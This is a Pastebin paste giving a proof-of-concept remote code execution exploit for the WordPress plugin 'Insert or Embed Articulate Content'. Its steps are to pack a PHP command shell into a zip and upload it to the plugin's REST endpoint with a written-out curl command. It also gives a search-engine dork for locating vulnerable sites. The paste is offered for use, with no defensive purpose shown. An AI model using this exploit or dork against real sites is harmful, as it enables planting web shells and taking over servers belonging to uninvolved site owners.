API tools faq
paste
ToKeiChun

WP Plugin Insert Articulate Content into RCE

ToKeiChun
Sep 21st, 2019
333
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.71 KB | None | 0 0
raw download clone embed print report
  1. WordPress Plugin Insert or Embed Articulate Content into WordPress Remote Code Execution
  2.  
  3. POC :
  4.  
  5. [-] go to site/index.php/wp-json/articulate/v1/upload-data
  6. [-] input file index.html and index.php on zip file
  7. [-] u input blank on index.html and u input command shell on index.php
  8. [-] curl site/index.php/wp-json/articulate/v1/upload-data -F "name=urzip.zip" -F "chunk={RANDOM NUMBER}" -F "chunks={RANDOM NUMBER}" -F "file=@urzip.zip"
  9.  
  10. DORK :
  11. inurl:/wp-content/plugins/insert-or-embed-articulate/
  12.  
  13. SS:
  14. https://khunerable.net/images/70256562_129728355060689_1409106120445788160_n.jpg
  15.  
  16. REFERENCE :
  17. https://cxsecurity.com/issue/WLB-2019060137
  18. https://www.exploitkita.org/2019/06/wordpress-plugin-insert-or-embed.html
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!